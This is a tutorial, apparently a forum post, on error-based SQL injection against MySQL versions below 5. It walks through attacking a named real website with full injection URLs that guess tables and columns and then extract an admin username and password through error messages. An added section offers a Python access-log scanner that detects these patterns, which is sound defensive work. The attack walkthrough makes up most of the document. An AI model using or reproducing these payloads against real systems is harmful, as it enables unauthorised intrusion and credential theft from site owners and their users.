SQL INJECTION WHERE THE VERSION IS LESS THAN 5.
Today I'm going to teach you how to inject a website whose MySQL version is less than 5.
As an example, I'm taking this site:
http://www.ultimatehomedesign.com/news-detail.php?id=312
NOTE: Don't step ahead if you don't know UNION-based SQL injection.
Getting Version
Now, let's check the version with an error-based query:
+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--
The version shows up in the error: Duplicate entry '4.1.22-standard~1' for key 1
Getting Tables
This site doesn't have information_schema, because the version is less than 5. We have to guess the table names.
This should be our syntax to guess the tables (replace Guess_table with the name you are testing):
or+1+group+by+concat_ws(0x7e,(select+1+from+Guess_table+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
Now we have to guess the table name with this syntax. Some tables that usually contain login data:
admin
adminstator
tbl_admin
tbl_adminstator
login
member
user
users
table_users
settings
Now I'm trying to guess the table name with that syntax.
http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+admin+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
I tried to guess the admin table. There is no table in the database named admin, so an error came up:
Table 'uhd.admin' doesn't exist
Let's try to guess another table.
http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+adminstator+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
Again an error came up. There is no table in the database named adminstator:
Table 'uhd.adminstator' doesn't exist
Let's try another table:
http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
No "doesn't exist" error came up this time, only the duplicate-entry message, so the users table exists:
Duplicate entry '1~1' for key 1
Getting Columns
Now we have to guess the column name. The syntax to get columns should be like this (replace column_name and table_name):
+or+1+group+by+concat_ws(0x7e,(select+column_name+from+table_name+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
username is the most common column name. Let's try it.
http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+username+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
An error came up. The column doesn't exist:
Unknown column 'username' in 'field list'
Let's try to guess another column, user_name.
http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_name+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
Now the site loads fine. That means user_name exists.
Now try to guess the password column. Let's try user_pass.
http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_pass+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
Extracting data from columns
To get data from the columns, our syntax should be this (replace column_name and table_name):
or+1+group+by+concat_ws(0x7e,(select+concat(column_name,0x7e,column_name)+from+table_name+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--
Sometimes this query doesn't work, and it doesn't work on this site. Then we have to use substring.
Getting Username:
www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(user_name,1,25))+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+users+group+by+x)a)
With this subquery and the substring function we can build a more complex question. The query pulls the value of the user_name column out of the users table, and substring(user_name,1,25) returns characters 1 to 25 of that value, so a long result can be fetched piece by piece by changing the offset.
The username comes up in the error message:
Duplicate entry 'root~1' for key 1
Getting Password:
http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(user_pass,1,25))+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+users+group+by+x)a)
The password came up:
Duplicate entry 'trump123~1' for key 1
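From the defender's side, the requests above leave a very recognisable trace in web-server access logs. The following added example (not from the original post) is a small Python scanner that URL-decodes the query string of each constructed access-log line and flags the group by / floor(rand(0)*2) duplicate-entry pattern this tutorial depends on, including the %20-encoded form; the log lines, IPs and indicator names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original post): a benign request, the
# group-by/floor(rand(0)*2) version probe, and a %20-encoded substring probe.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /news-detail.php?id=312 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1-- HTTP/1.1" 500 310
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select%20substring(user_name,1,25)%20from%20users%20limit%200,1),floor(rand(0)*2))x%20from%20users%20group%20by%20x)a) HTTP/1.1" 500 290
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each indicator is matched against the decoded, lower-cased query string.
# "group by" together with "floor(rand(" in either order is the core of the
# duplicate-entry trick; the others are the helper fragments seen in the post.
INDICATORS = {
    "rand_floor_group_by": re.compile(r"(group\s+by.*floor\s*\(\s*rand\s*\()|(floor\s*\(\s*rand\s*\(.*group\s+by)", re.S),
    "having_min_0": re.compile(r"having\s+min\s*\(\s*0\s*\)"),
    "concat_ws_0x7e": re.compile(r"concat_ws\s*\(\s*0x7e"),
    "substring_probe": re.compile(r"substring\s*\(\s*\w+\s*,\s*\d+\s*,\s*\d+\s*\)"),
}

def normalize_query(target: str) -> str:
    """Return the decoded, lower-cased, whitespace-collapsed query string of a request target."""
    query = target.partition("?")[2]
    # '+' and %xx both appear in the wild; unquote_plus handles both in one pass.
    return re.sub(r"\s+", " ", unquote_plus(query)).lower()

def classify(query: str) -> list[str]:
    """Names of the indicators that fire on an already-normalized query."""
    return [name for name, rx in INDICATORS.items() if rx.search(query)]

def scan_log(text: str) -> list[dict]:
    """Parse access-log lines and return one record per flagged request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        found = classify(normalize_query(m["target"]))
        if found:
            hits.append({"ip": m["ip"], "status": int(m["status"]), "indicators": found})
    return hits

for hit in scan_log(SAMPLE_LOG):
    print(hit)
```

Only the two probe lines are reported; pairing the indicators with a 500 status and a response body containing "Duplicate entry" is a strong signal that the error message is being used as the data channel.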
Hope you learned something. :D Okay mates, stay tuned for the next tutorial on SQL injection :D